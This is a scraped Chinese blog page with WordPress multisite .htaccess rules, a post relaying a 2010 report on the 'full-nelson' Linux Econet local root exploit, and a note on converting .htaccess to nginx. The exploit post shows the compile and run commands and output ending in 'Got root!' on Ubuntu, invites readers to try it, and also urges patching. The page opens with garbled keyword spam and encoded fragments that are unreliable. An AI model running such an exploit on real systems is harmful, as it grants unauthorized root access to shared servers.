Www.wg7com 0

Www Quickwpthemes Quick Wp Themes Szh Profile 16978291846086202690 Quick Wp Themes Mr. 21

Www Quickwpthemes Quick Wp Themes Szh Profile 16978291846086202690 Quick Wp Themes

searchesearchr Quick t Szh Rsearchlsearch search( Www _ 16978291846086202690 - Quick az 16978291846086202690 - 16978291846086202690 -search+ Szh )(0p%C5%B7%C3%C0%B3%C9%C8%CB%CE%DE%C2%EB%D4%AD%B4%B4%C7%F8( Szh o 16978291846086202690 t Szh n Quick |dsearchisearch|n 16978291846086202690 ld Www ssearch. Www ) Www $search  Quick L Themes 
searchR Szh wsearchiesearchu Themes esearch^[ 16978291846086202690 0 Quickwpthemes 9-searchA Profile Z Quick ]search/ Www ?search.*search. Profile h Szh )search search2 Szh [%B3%F6%D1%DD%D5%DF%A3%BA%A4%A2%A4%B9%A4%AB%A4%EA%A4%CE%A3%AF%CF%C9%B5%C0%B4%BA%C4%CE%A3%AF%B2%D6%B1%BE%CD%AB%A3%AF%A5%A2%A5%B2%A5%CF%A3%AF%BC%D3%CC%D9%A5%EC%A5%A4%A5%CA]

无效的规则:

1
2
RewriteRule ^[_0-9a-zA-Z-]+/(wp-(content|admin|includes).*) $1 [L]
RewriteRule ^[_0-9a-zA-Z-]+/(.*\.php)$ $1 [L]

-EOF-

——————–
引用参考:
WordPress Support: support/topic/wp-multisite-htaccess-not-working
Perishable Pre: press/2010/07/07/htaccess-code-for-wordpress-multisite/
WordPress Codex: Migrating_Multiple_Blogs_into_WordPress_3.0_Multisite
WordPress Codex: Create_A_Network

Tags: , , , , , 213, Posted in WordPress2 条评论

利用Linux内核的多个安全漏洞提权

2010/12/20

这是来自VPSee的消息,因为我个人试了一下Debian表示没有鸭梨,于是转过来,手痒的Ubunu用户可以试试……

——————————————-这是手痒的分割线——————————————-

系统安全高手 Dan Rosenberg 发布了一段 C 程序,这段200多行的程序利用了 Linux Econet 协议的3个安全漏洞,可以导致本地帐号对系统进行拒绝服务或特权提升,也就是说一个普通用户可以通过运行这段程序后轻松获得 root shell,以下在 update 过的 Ubuntu 10.04 Server LTS 上测试通过:

$ uname -r
2.6.32-21-server
 
$ gcc full-nelson.c -o full-nelson
$ ./full-nelson
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xffffffffa0131510
 [+] Resolved econet_ops to 0xffffffffa0131600
 [+] Resolved commit_creds to 0xffffffff8108b820
 [+] Resolved prepare_kernel_cred to 0xffffffff8108bc00
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Got root!
#

由于 RHEL/CentOS 默认不支持 Econet 协议,所以测试没有通过:

$ uname -r
2.6.18-194.26.1.el5
 
$ gcc full-nelson.c -o full-nelson
$ ./full-nelson
[*] Failed to open file descriptors.

如果在企业环境用 Ubuntu 的话可能会比较杯具了,几百个帐号里总可以找到一两个帐号被内部或外部人员通过上面这段程序拿到 root,这对服务器的危害是毁灭性的。前天还在说 Ubuntu 在内核方面无作为,现在想起来还有点后怕。VPSee 提醒正在使用多个普通帐号登录 Ubuntu VPS 的朋友及时升级或打内核补丁,出售 VPN/SSH 帐号、提供免费 SSH 的商家尤其要小心 “客户” 捣乱,使用其他 Linux 发行版的朋友也最好检查一下自己的 VPS 有没有这些高危漏洞。

——————————————-这是手痒的分割线——————————————-

21个人的测试,在Debian 5.0.6上测试,结果如下:

$ uname -r
2.6.26-2-xen-amd64
$ gcc h.c -o h
$ ./h
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xffffffffa017819b
 [+] Resolved econet_ops to 0xffffffffa01791e0
[*] Failed to resolve kernel symbols.

同时,各位提供SSH番羽墙的童鞋,只要把用户的shell设置为nologin便可以表示没有鸭梨了~

-EOF-

Tags: , , , , , 151, Posted in 开源盛试6 条评论

Convert .htaccess to nginx

2010/12/10

这篇,我稍微微博一下好了 …… 这么好的工具,不得不马克一下~

Link: convert-apache-htaccess-to-nginx/

不过据说有人因此Nginx起不来,大家慎用就是了……

-EOF-

Tags: , , , 65, Posted in 软言软语2 条评论

下一页